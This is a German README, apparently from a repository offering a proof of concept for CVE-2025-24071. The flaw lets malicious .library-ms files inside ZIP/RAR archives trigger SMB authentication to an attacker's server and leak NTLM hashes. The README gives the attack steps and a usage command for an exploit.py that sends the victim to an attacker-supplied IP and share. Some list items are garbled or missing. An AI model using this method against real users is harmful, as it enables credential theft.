
CVE-2025-24071 Proof Of Concept
CVE-2025-24071 ist eine Spoofing-Sicherheitslücke im Windows Explorer, die es einem nicht authentifizierten Angreifer ermöglicht, vertrauliche Informationen über ein Netzwerk preiszugeben. Die Sicherheitslücke entsteht aufgrund des impliziten Vertrauens und des automatischen Parsing-Verhaltens von .library-ms-Dateien im Windows Explorer. Durch das Erstellen bösartiger Archivdateien (z. B. RAR/ZIP), die .library-ms-Dateien mit eingebetteten SMB-Pfaden enthalten, kann ein Angreifer beim Extrahieren eine SMB-Authentifizierungsanforderung auslösen und möglicherweise den NTLM-Hash des Benutzers offenlegen.
Die Sicherheitslücke betrifft die folgenden Windows-Versionen:
Eine vollständige Liste der betroffenen Systeme finden Sie im Microsoft Security Update Guide.
Ein Angreifer kann diese Sicherheitslücke ausnutzen, indem er:
.library-ms-Datei mit einem bösartigen SMB-Pfad..library-ms-Datei in ein RAR- oder ZIP-Archiv..library-ms-Datei und initiiert eine SMB-Authentifizierungsanforderung an den Server des Angreifers.Diese Methode nutzt das Verhalten des Windows Explorers beim Umgang mit .library-ms-Dateien und den Authentifizierungsmechanismus des SMB-Protokolls.
Dieses Repository enthält einen PoC, der die Sicherheitslücke demonstriert, in diesem Fall das Hochladen der Datei über SMB:
exploit.py: Skript zum Erstellen einer bösartigen .library-ms-Datei und zum Verpacken in ein ZIP-Archiv.Verwendung:
python exploit.py --ip $IP --filename payload --share share-name



